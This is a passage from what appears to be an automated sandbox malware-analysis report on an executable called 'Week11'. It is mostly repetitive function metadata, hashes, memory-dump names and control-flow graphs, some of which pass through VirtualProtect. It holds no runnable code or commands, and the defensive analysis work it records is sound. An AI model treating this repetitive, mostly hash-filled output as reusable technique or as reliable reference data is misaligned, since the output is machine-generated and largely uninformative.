                                • Instruction Fuzzy Hash: B442F0B2D046A88BE7208B24DC44BEABB75EF81310F1440FED44D97682E67D5EC6CB56
                                Function 004057D3 Relevance: 47.7, APIs: 1, Strings: 26, Instructions: 462COMMON
                                Download Yara Rule

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: e2ffb6181c023541538bd59b1230caad31e0c08fc34fb9f81d143e12f99e12f4
                                • Instruction ID: 08b73537eb7e8e6e88a36dc168ac67b40aac40a4c573c5969c336370d1323930
                                • Opcode Fuzzy Hash: e2ffb6181c023541538bd59b1230caad31e0c08fc34fb9f81d143e12f99e12f4
                                • Instruction Fuzzy Hash: 530223B1D092989EF7208A24DC84BEB7B75EF91304F0881FAD44D66281D27E5FC58F62
                                Function 00405D31 Relevance: 47.7, APIs: 1, Strings: 26, Instructions: 423COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 332 405d31-405dc1 335 405e62-405eb3 332->335 336 405dc7-405dd7 332->336 338 405ec1-405f18 335->338 339 405eb5-405ebf 335->339 336->335 337 405ddd-405df2 call 405df3 336->337 337->335 344 405f26 338->344 345 405f1a-405f24 338->345 341 405f30-405f37 339->341 346 405f47 341->346 347 405f39-405f45 341->347 344->341 345->341 346->332 348 405f58-405fde call 405fcd 346->348 347->348 352 405fe0-405fe7 348->352 353 405fe9-406027 348->353 352->353 354 40602f-4064b5 call 406047 call 406061 call 406498 352->354 353->354 370 406db2-41f598 call 406dc7 call 406e2c call 408067 call 40711e 354->370 371 4064bb-406641 354->371 373 406652-4066bb call 4066c8 371->373 374 406643-40664d 371->374 376 4068f9-406932 373->376 374->376 378 406934-4074f9 call 40694c call 4074b9 VirtualProtect 376->378 379 406975-406cde 376->379 412 407541-40754d 378->412 413 4074fb-40751a call 40751b 378->413 379->370 416 40755e-4075b8 call 40758c 412->416
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 0c424b1fc99a087ce2db880a6f0d9f597395fc10eb7467f60121ca015e55ec16
                                • Instruction ID: bf0c5237c15ef48bcd96dc2977521d44ff8f2587dad0db81f896beb4dd51fd81
                                • Opcode Fuzzy Hash: 0c424b1fc99a087ce2db880a6f0d9f597395fc10eb7467f60121ca015e55ec16
                                • Instruction Fuzzy Hash: A602D3B1D086998AFB20CA24CC84BEB7BB5EF91304F1441FAD44DA6282D67D1FC58F56
                                Function 00405DF3 Relevance: 47.7, APIs: 1, Strings: 26, Instructions: 404COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 423 405df3-405e2e 424 405e30-405e52 423->424 425 405e54 423->425 424->425 426 405e5b 424->426 429 405db0-405dc1 425->429 428 405e62-405eb3 426->428 431 405ec1-405f18 428->431 432 405eb5-405ebf 428->432 429->428 430 405dc7-405dd7 429->430 430->428 433 405ddd-405df2 call 405df3 430->433 437 405f26 431->437 438 405f1a-405f24 431->438 434 405f30-405f37 432->434 433->428 439 405f47 434->439 440 405f39-405f45 434->440 437->434 438->434 441 405f58-405fde call 405fcd 439->441 442 405d31-405d9f 439->442 440->441 448 405fe0-405fe7 441->448 449 405fe9-406027 441->449 442->429 448->449 450 40602f-4064b5 call 406047 call 406061 call 406498 448->450 449->450 466 406db2-41f598 call 406dc7 call 406e2c call 408067 call 40711e 450->466 467 4064bb-406641 450->467 469 406652-4066bb call 4066c8 467->469 470 406643-40664d 467->470 472 4068f9-406932 469->472 470->472 474 406934-4074f9 call 40694c call 4074b9 VirtualProtect 472->474 475 406975-406cde 472->475 508 407541-40754d 474->508 509 4074fb-40751a call 40751b 474->509 475->466 512 40755e-4075b8 call 40758c 508->512
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 322f25862a60c191500efcdc35d68742451c2e059e7fb2d1509d5f02938bf478
                                • Instruction ID: e9d56f7de48b27e66a140c9ab83341e1eeedbd670ca2fa2dd3d6c45633e1db51
                                • Opcode Fuzzy Hash: 322f25862a60c191500efcdc35d68742451c2e059e7fb2d1509d5f02938bf478
                                • Instruction Fuzzy Hash: BCF1D4B1D086998AF720CA24CC84BEB7B75EF92304F0441FAD44DA6682D67E1FC58F56
                                Function 00405B7D Relevance: 47.7, APIs: 1, Strings: 26, Instructions: 403COMMON
                                Download Yara Rule

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: eb7622dd5255eba868280313c1bb5c852cb3ffeb95a4a3cdf3b67cf976482b23
                                • Instruction ID: 45ca8dbfdf14d572f5844f96886c6271579ef3de78a8368e969f3b09dc572996
                                • Opcode Fuzzy Hash: eb7622dd5255eba868280313c1bb5c852cb3ffeb95a4a3cdf3b67cf976482b23
                                • Instruction Fuzzy Hash: 24F1F3B1D086989EF7208A24DC84BEB7B75EF91304F0441FAD44DA6282D67D5FC58F62
                                Function 00405B2C Relevance: 47.6, APIs: 1, Strings: 26, Instructions: 389COMMON
                                Download Yara Rule

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: b430d677837d89d4f9e3a9db6cb5c65cfd6384359e44a2bee124108e1d6cc75f
                                • Instruction ID: b79ffa20ab34d5cb6634e1a52c7b3afdc2bdf96a51776a287b2c37c807a6f03d
                                • Opcode Fuzzy Hash: b430d677837d89d4f9e3a9db6cb5c65cfd6384359e44a2bee124108e1d6cc75f
                                • Instruction Fuzzy Hash: F4E1F2B1D092989EF7208A24DC84BEBBB75EF91304F0441FAD44D66282D67E5FC58F62
                                Function 004058F0 Relevance: 47.6, APIs: 1, Strings: 26, Instructions: 386COMMON
                                Download Yara Rule

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 4aeca380645f61cecc87b06a4fc475c62ba13c4de5e4a50eb893f9c8726b6cdc
                                • Instruction ID: 1d69f3a1e479d09448e965da535d8a52a3378ef0851e8ffb0b353f5724c677ca
                                • Opcode Fuzzy Hash: 4aeca380645f61cecc87b06a4fc475c62ba13c4de5e4a50eb893f9c8726b6cdc
                                • Instruction Fuzzy Hash: E0E1F3B1D092989EF7208A24DC84BEB7B75EF91304F0441FAD44D66282D67E1FC58F66
                                Function 00405B3E Relevance: 47.6, APIs: 1, Strings: 26, Instructions: 380COMMON
                                Download Yara Rule

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 3f9aaad319541cb4f156a2e2904b4bc839c02407fc05a3112f3bb927a77e0b2c
                                • Instruction ID: 4ff2dfb957d96c90f15d76ef9a3cf5ca00bf787cc9faca43a72ce751b9e99cf4
                                • Opcode Fuzzy Hash: 3f9aaad319541cb4f156a2e2904b4bc839c02407fc05a3112f3bb927a77e0b2c
                                • Instruction Fuzzy Hash: 26E1E2B1D092989EF7208A24DC84BEBBB75EF91304F0441FAD44D66282D67E1FC58F66
                                Function 0040596A Relevance: 47.6, APIs: 1, Strings: 26, Instructions: 375COMMON
                                Download Yara Rule

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: fccf4c754a4bfd12344c3f771928471eb25d25576a74ef1b6d242388c3c116eb
                                • Instruction ID: 742f33448f4c103e6015b0d908c1e64736ba089dba9e13aa25fb16fa700a4926
                                • Opcode Fuzzy Hash: fccf4c754a4bfd12344c3f771928471eb25d25576a74ef1b6d242388c3c116eb
                                • Instruction Fuzzy Hash: 70E1E2B1D092989EF7208A24DC84BEBBB75EF91304F0441FAD44D66282D67E1FC58F66
                                Function 0040541D Relevance: 47.6, APIs: 1, Strings: 26, Instructions: 359COMMON
                                Download Yara Rule

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 3d2126126e218fe79e1625d8c6bf9eef1770de78b8e6f1eed8cfeb18f920a563
                                • Instruction ID: d55277f9546d1a84aac084c102d29f0f5530346181b0dece6d9dd37c447b40a3
                                • Opcode Fuzzy Hash: 3d2126126e218fe79e1625d8c6bf9eef1770de78b8e6f1eed8cfeb18f920a563
                                • Instruction Fuzzy Hash: 2ED1F5B1D082989EF720CA24DC44BEBBB75EF91304F0441FAD44DA6282D67E1FD58B66
                                Function 00405ECE Relevance: 47.6, APIs: 1, Strings: 26, Instructions: 357COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1011 405ece-405f18 1012 405f26 1011->1012 1013 405f1a-405f24 1011->1013 1014 405f30-405f37 1012->1014 1013->1014 1015 405f47 1014->1015 1016 405f39-405f45 1014->1016 1017 405f58-405fde call 405fcd 1015->1017 1018 405d31-405dc1 1015->1018 1016->1017 1027 405fe0-405fe7 1017->1027 1028 405fe9-406027 1017->1028 1023 405e62-405eb3 1018->1023 1024 405dc7-405dd7 1018->1024 1029 405ec1-405f18 1023->1029 1030 405eb5-405ebf 1023->1030 1024->1023 1026 405ddd-405df2 call 405df3 1024->1026 1026->1023 1027->1028 1032 40602f-4064b5 call 406047 call 406061 call 406498 1027->1032 1028->1032 1029->1012 1029->1013 1030->1014 1050 406db2-41f598 call 406dc7 call 406e2c call 408067 call 40711e 1032->1050 1051 4064bb-406641 1032->1051 1053 406652-4066bb call 4066c8 1051->1053 1054 406643-40664d 1051->1054 1056 4068f9-406932 1053->1056 1054->1056 1058 406934-4074f9 call 40694c call 4074b9 VirtualProtect 1056->1058 1059 406975-406cde 1056->1059 1092 407541-40754d 1058->1092 1093 4074fb-40751a call 40751b 1058->1093 1059->1050 1096 40755e-4075b8 call 40758c 1092->1096
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 9b89c58e131aaa6c93aeedc91e8ae2000b0b64919f9d56cec03f1c6c7206eb3c
                                • Instruction ID: 26ec9bedaf6d3df76419a4bcffc395a901d8bbcc21cb015fd304402578a90765
                                • Opcode Fuzzy Hash: 9b89c58e131aaa6c93aeedc91e8ae2000b0b64919f9d56cec03f1c6c7206eb3c
                                • Instruction Fuzzy Hash: 4FE1D4A1D092998EF720CA24DC84BEB7B75EF91304F0441FAD44D66682D67E1FC58F62
                                Function 00405845 Relevance: 47.6, APIs: 1, Strings: 26, Instructions: 342COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1103 405845-405fde call 405fcd 1108 405fe0-405fe7 1103->1108 1109 405fe9-406027 1103->1109 1108->1109 1110 40602f-4064b5 call 406047 call 406061 call 406498 1108->1110 1109->1110 1126 406db2-41f598 call 406dc7 call 406e2c call 408067 call 40711e 1110->1126 1127 4064bb-406641 1110->1127 1129 406652-4066bb call 4066c8 1127->1129 1130 406643-40664d 1127->1130 1132 4068f9-406932 1129->1132 1130->1132 1134 406934-4074f9 call 40694c call 4074b9 VirtualProtect 1132->1134 1135 406975-406cde 1132->1135 1168 407541-40754d 1134->1168 1169 4074fb-40751a call 40751b 1134->1169 1135->1126 1172 40755e-4075b8 call 40758c 1168->1172
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: bdc128cfa0736e7e7fbaf3617266de0173ff0f2d0559b16b46de260ff73863c8
                                • Instruction ID: b965cf8034f0f3c64d6398397f16d84dbfba2d492e66c82caf477a07806e27c0
                                • Opcode Fuzzy Hash: bdc128cfa0736e7e7fbaf3617266de0173ff0f2d0559b16b46de260ff73863c8
                                • Instruction Fuzzy Hash: 2DD1F6A1D093989EF720CA24DC84BEB7B75EF91304F0441FAD44DA6682D67E1FC58B62
                                Function 00405C29 Relevance: 47.6, APIs: 1, Strings: 26, Instructions: 342COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1179 405c29-405fde call 405fcd 1185 405fe0-405fe7 1179->1185 1186 405fe9-406027 1179->1186 1185->1186 1187 40602f-4064b5 call 406047 call 406061 call 406498 1185->1187 1186->1187 1203 406db2-41f598 call 406dc7 call 406e2c call 408067 call 40711e 1187->1203 1204 4064bb-406641 1187->1204 1206 406652-4066bb call 4066c8 1204->1206 1207 406643-40664d 1204->1207 1209 4068f9-406932 1206->1209 1207->1209 1211 406934-4074f9 call 40694c call 4074b9 VirtualProtect 1209->1211 1212 406975-406cde 1209->1212 1245 407541-40754d 1211->1245 1246 4074fb-40751a call 40751b 1211->1246 1212->1203 1249 40755e-4075b8 call 40758c 1245->1249
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 3cdefca123af0d90453a608f58c0086b16cd8f7d2bc176c7e1a899f348f0179f
                                • Instruction ID: c3debf119573568fc0430f50f96b5e134cd5e479a97db9a0777a0a33d1310734
                                • Opcode Fuzzy Hash: 3cdefca123af0d90453a608f58c0086b16cd8f7d2bc176c7e1a899f348f0179f
                                • Instruction Fuzzy Hash: 1AD1B2B1D092989EF7208A24DC84BEB7B75EF91304F0441FAD48D66282D67E1FC58F66
                                Function 00405C7E Relevance: 47.6, APIs: 1, Strings: 26, Instructions: 332COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1256 405c7e-405fde call 405fcd 1261 405fe0-405fe7 1256->1261 1262 405fe9-406027 1256->1262 1261->1262 1263 40602f-4064b5 call 406047 call 406061 call 406498 1261->1263 1262->1263 1279 406db2-41f598 call 406dc7 call 406e2c call 408067 call 40711e 1263->1279 1280 4064bb-406641 1263->1280 1282 406652-4066bb call 4066c8 1280->1282 1283 406643-40664d 1280->1283 1285 4068f9-406932 1282->1285 1283->1285 1287 406934-4074f9 call 40694c call 4074b9 VirtualProtect 1285->1287 1288 406975-406cde 1285->1288 1321 407541-40754d 1287->1321 1322 4074fb-40751a call 40751b 1287->1322 1288->1279 1325 40755e-4075b8 call 40758c 1321->1325
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
